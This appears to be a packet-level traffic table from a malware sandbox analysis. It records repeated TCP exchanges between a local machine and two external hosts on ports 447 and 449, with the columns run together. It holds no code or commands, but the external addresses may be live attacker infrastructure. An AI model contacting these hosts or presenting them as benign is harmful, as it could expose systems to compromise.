Jun 5, 2018 11:06:33.734884024 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:06:33.734906912 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.765734911 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.765779018 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.765791893 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.765820980 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.765835047 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.765957117 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:06:33.765989065 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.766016960 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.766040087 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.766156912 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.766855001 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:06:33.766886950 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.768455982 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.768480062 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.768610001 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:06:33.768634081 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.778738022 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.779011965 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:06:33.779061079 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.790874958 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.791085005 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:06:33.791115999 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.810244083 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.810285091 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.810308933 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.810422897 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:06:33.810457945 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.810513973 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.810539007 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.810575008 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.810600996 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.811084032 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:06:33.811117887 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.813076019 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.813122988 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.813339949 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:06:33.813378096 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.822438002 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.822477102 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.822495937 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.822511911 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.822674990 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.822695017 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.822715044 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.822861910 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:06:33.822892904 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.822906971 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.822915077 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.823381901 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:06:33.825222015 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.825261116 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.825323105 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:06:33.834412098 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:06:33.866350889 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.866389990 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.866401911 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.866472960 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:06:33.866655111 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.866676092 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.866694927 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.866708994 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.866727114 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.866854906 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:06:33.866883039 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.869129896 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.869158030 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.869354010 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:06:33.869400024 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.900403023 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.900448084 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.900558949 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:06:33.900588036 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.925052881 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.925450087 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:06:33.925477982 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:34.135000944 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:34.135127068 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:06.263549089 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:06.263596058 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:06.604901075 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:06.608486891 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:06.608525991 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:06.935661077 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:07.183624029 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:11.999659061 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:11.999696016 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:12.264550924 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:12.265913010 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:12.265944958 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:12.270051003 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:12.270075083 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:12.270195961 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:12.270219088 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:12.270715952 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:12.270740986 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:13.106668949 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:13.233124971 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.233158112 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.324830055 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:13.695141077 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.695174932 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.695183039 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.695780039 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.703166962 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.703185081 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.703192949 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.703444004 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.713992119 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.714013100 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.714020967 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.714253902 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.724608898 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.724628925 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.724636078 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.724646091 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.724653006 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.724869013 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.724891901 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.727478981 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.727588892 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.727610111 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.750475883 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.750494957 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.750618935 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.750638962 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.753282070 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.753298044 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.753308058 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.753416061 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.753434896 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.767070055 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.767088890 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.767229080 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.767251968 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.775295973 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.775307894 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.775604010 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.775628090 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.778011084 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.778024912 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.778160095 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.778181076 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.789920092 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.789940119 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.790036917 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.790059090 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.800867081 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.800884008 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.800893068 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.800906897 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.800915003 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.801024914 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.801048040 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.803636074 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.803652048 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.803663015 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.803774118 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.803793907 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.811007023 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.811023951 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.811144114 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.811166048 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.813719988 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.813765049 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.813836098 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.813854933 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.829057932 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.829087019 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.829185963 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.829201937 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.829221010 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.829230070 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.829245090 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.829255104 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.829354048 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.829366922 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.829543114 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.829561949 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.829574108 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.829581022 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.829586983 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.830044985 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.830137014 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.830151081 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.830169916 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.830490112 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.830508947 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.831935883 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.832037926 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.832061052 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.860178947 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.860205889 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.860234976 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.860269070 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.860395908 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.860423088 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.860449076 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.860472918 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.860487938 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.860502958 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.860518932 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.860683918 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.860826969 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.860873938 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.860897064 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.860912085 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.860928059 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.860941887 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.861697912 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.862900972 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.862934113 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.862948895 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.863126040 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.870192051 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.870228052 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.870256901 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.870275021 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.870302916 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.870429993 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.870466948 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.873018026 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.873045921 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.873060942 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.873210907 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.873250961 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.882935047 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.882992029 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.883008003 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.883013010 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.883019924 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.883198977 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.883220911 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.883253098 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.883269072 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.883285046 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.883302927 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.883444071 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.883467913 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.883680105 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.883718014 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.883738995 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.884727955 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.885657072 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.885688066 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.885869026 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.890909910 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.890945911 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.890978098 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.891032934 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.891062975 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.891208887 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.891249895 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.893764973 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.893855095 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.893872023 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.902744055 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.902786970 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.902817011 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.902846098 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.902858019 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.902879953 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.903146982 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.903176069 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.903201103 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.903218985 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.903271914 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.903295994 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.903798103 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.905467987 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.905492067 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.905502081 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.905642986 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.905668020 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.914278984 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.914309978 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.914328098 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.914340019 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.914359093 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.914510012 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.914516926 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.914541006 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.914556026 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.914921045 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.917022943 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.917052984 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.917238951 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.926285982 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.926326036 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.926346064 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.926589966 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.926601887 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.926630020 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.926659107 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.926693916 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.926719904 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.926742077 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.927083015 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.927129984 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.929164886 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.929193020 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.929383993 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.929426908 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.938941956 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.939009905 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.939042091 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.939063072 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.939088106 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.939232111 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.939269066 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.939296007 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.939326048 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.939637899 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.939657927 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.941059113 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.941071987 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.941207886 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.941237926 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.941245079 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.941266060 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.941302061 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.941320896 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.941335917 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.941550016 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.941571951 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.942308903 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.942338943 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.942358017 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.942365885 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.943072081 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.946649075 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.946681023 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.946691990 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.946706057 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.946716070 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.946893930 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.946933031 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.949558973 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.949595928 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.949722052 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.949764013 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.954874992 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.954901934 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.955152035 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.955200911 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.957720041 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.957753897 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.958000898 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.958075047 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.966722012 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.966741085 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.966759920 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.966773987 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.966788054 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.966878891 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.966888905 MESZ4474919294.250.254.22192.168.1.16
